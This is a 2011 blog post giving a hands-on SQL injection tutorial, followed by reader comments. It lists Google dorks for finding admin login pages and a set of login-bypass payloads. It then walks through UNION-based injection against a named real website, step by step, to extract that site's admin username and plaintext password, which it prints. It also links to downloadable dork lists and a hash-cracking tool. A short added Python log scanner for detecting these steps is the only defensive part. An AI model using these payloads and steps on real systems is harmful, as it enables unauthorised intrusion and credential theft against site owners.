Saturday, June 25, 2011

Complete Manual SQL Tutorial.

Introduction:
Hello everyone.
I am going to share one of my best tutorials here.

Now let's begin!!

SQL injection (aka SQLi or Structured Query Language injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting-off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is basically injecting queries into a database, or using queries to get an authorization bypass as an admin.

Things you should know:
Data is in the columns, the columns are in tables, and the tables are in the database.
Just remember that so you understand the rest.

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp sites.
First we need to find a site; start by opening Google.
Now we type our dork. Definition of a dork: "a search entry for a certain type of site/exploit, etc."
There are a large number of Google dorks for basic SQL injection.
Here are the best:

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now, what to do once we get to our site.
The site should look something like this:
ADMIN USERNAME :
PASSWORD :

So what we do here is: in the username we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
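So your input should look like this:

username:Admin
password:'or'1'='1
The quote closes the password string in the site's SQL query and the or condition that follows is always true, so the query matches the admin row without the real password and gives you authorisation to enter as admin.

If the site is vulnerable then you are in :D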

PART 2
Finding Sites to Inject

Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS: I didn't put them in the thread because I passed the count limit...
Pick one of those dorks and add inurl: before it (if it does not already have it) and then copy and paste it into Google. Pick one of the sites off Google and go to it.
For example, the URL of the page you are on may look like this:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check whether it is vulnerable, all you have to do is add a ' to the end of the URL.

So our link should look like this:

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'
Press Enter and you get some kind of error. The errors will vary...

[Screenshot: the error page]
After you find your vulnerable site, the first step you need to take is to find the number of columns. The easiest way to do this is to write "order by" followed by a column number, and add "--" after the number.
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--
If you get an error, that means you should lower the number of columns.
Let's try 10.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--
The page opened normally, which means the number of columns is between 10 and 14.
Now we try 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--
The page opened normally too...
Let's try 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--
We got an error. That means the number of columns is 11, because we got an error on 12 and 11 opened normally.

Finding Accessible Columns
Now that we have the number of columns, we need to find the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" and replacing the "order by #" with "union all select" followed by the column numbers.
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
We should get numbers.

[Screenshot: the page showing some of the column numbers]

For the end part of the URL (1,2,3,4,5,6,7,8,9,10,11), you put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
The numbers shown on the page are the column numbers we can get information from. We will replace them later with something else, so write them down if you want.

Getting Database Version
We found that columns 8, 3, 4 and 5 are vulnerable, so we will use them to get the database version.
Why do we do that?
If the database version is under 5, we will have to guess the table names, because information_schema (used below to list tables and columns) only exists from MySQL 5.0 onward.
To do that we need to replace one of the vulnerable columns with "@@version".
Let's take column 8.
Our link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

[Screenshot: the page showing the database version]

In our case we got "5.0.77"; it's >5 so we can continue.

Now we need to get the name of the table we want to access:
To do it we need to replace "@@version" with "table_name", add "from information_schema.tables" after the last column number, and add the "--" at the end.
The link should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

[Screenshot: the page listing the table names]

Now we search for the table we want to access.
We should find something with admin in it, and in our case it's tbladmin.


Now we need to get the ASCII values of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
To get the ASCII values of "tbladmin", go to this site: http://getyourwebsitehere.com/jswb/text_to_ascii.html


Enter the table name, which is "tbladmin" in our case, in the first box and click convert to ASCII.
You will get this value:
Code:
&#116;&#98;&#108;&#97;&#100;&#109;&#105;&#110;
Now remove the characters & # ; and add a comma "," between each number.
It should look like this:
Code:
116,98,108,97,100,109,105,110


Now in the URL we replace "table_name" with "column_name", change "information_schema.tables" to "information_schema.columns", and add "where table_name=char(ASCII value)--".
In our case, in place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
[Screenshot: the page listing the column names]


Now we search for the columns named "username" and "password" or something like that.
In our case they are "username" and "password".
Now we can delete most of the URL.
Remove everything after the 11 and add "from tbladmin", and replace "column_name" with "concat(username,0x3a,password)".
0x3a is the hex ASCII value of a colon (:), so we can separate the username from the password.
Our URL should look like this:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
[Screenshot: the page showing the username and password]


And you're done: the username is ishir and the password is ishir123.
Sometimes the password is stored as a hash.
Use my hash detector to find out which kind it is and look it up online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ <---- the password is in it somewhere :)
And we're done!

I hope you liked my tutorial.
All credits go to me!
Thanks for reading this thread.
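Seen from the server side, each step of Part 2 leaves a recognisable request in the web access log. The following added example (not from the original post) scans log lines for those steps per client; the log format, IP addresses, sample lines and regular expressions are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Combined-log-format prefix: client IP and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')

# One pattern per step of the walkthrough, applied to decoded parameter values.
STAGES = [
    ("quote probe", re.compile(r"^-?\d+'$")),
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version disclosure", re.compile(r"@@version", re.I)),
    ("schema enumeration",
     re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
    ("char() literal", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
]

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
192.0.2.10 - - [25/Jun/2011:10:00:00 +0000] "GET /newsdetail.php?id=10 HTTP/1.1" 200 5120
192.0.2.10 - - [25/Jun/2011:10:00:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 2048
198.51.100.7 - - [25/Jun/2011:10:01:00 +0000] "GET /newsdetail.php?id=10%27 HTTP/1.1" 500 312
198.51.100.7 - - [25/Jun/2011:10:01:20 +0000] "GET /newsdetail.php?id=10%20order%20by%2012-- HTTP/1.1" 500 312
198.51.100.7 - - [25/Jun/2011:10:02:00 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,@@version,9,10,11-- HTTP/1.1" 200 5200
198.51.100.7 - - [25/Jun/2011:10:02:30 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,table_name,9,10,11%20from%20information_schema.tables-- HTTP/1.1" 200 9000
198.51.100.7 - - [25/Jun/2011:10:03:00 +0000] "GET /newsdetail.php?id=-10%20union%20all%20select%201,2,3,4,5,6,7,column_name,9,10,11%20from%20information_schema.columns%20where%20table_name=char(116,98,108,97,100,109,105,110)-- HTTP/1.1" 200 5300
"""


def scan(log_text: str) -> dict:
    """Return {client_ip: [stage names in the order first seen]}."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target = m.groups()
        query = urlsplit(target).query
        # parse_qsl URL-decodes each value (%20, %27, +) before matching.
        for _name, value in parse_qsl(query, keep_blank_values=True):
            for stage, pattern in STAGES:
                if pattern.search(value) and stage not in findings.setdefault(ip, []):
                    findings[ip].append(stage)
    return findings


if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

This only sees GET parameters that reach the access log; POST bodies, such as the login form in Part 1, need application or WAF logging to be visible.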

44 comments:

H A NAZIR GILL said...

Amazing! I did not read such a good tutorial first
Thanks a lot

Anonymous said...

Good stuff, but when trying to access via FTP with the user pw, it doesn't accept them...

Avais Waseem said...

Thanks for such nice comments

Anonymous said...

but how I'm going to find the admin panel????????

Shoaib siddiqui said...

636f6c6c6174696f6e i got this after converting the text now what to do m confused.......

Anonymous said...

awe

Anonymous said...

http://www.mediafire.com/?y7v30lcj0kn8836

this file password....???

Anonymous said...

nice

Nuha Sultana said...

When I read ande's tut on SQL Injection and one of relax's practical example,I didn't find them full. So,I searched the web and found this one.This tut explains everything about SQLi.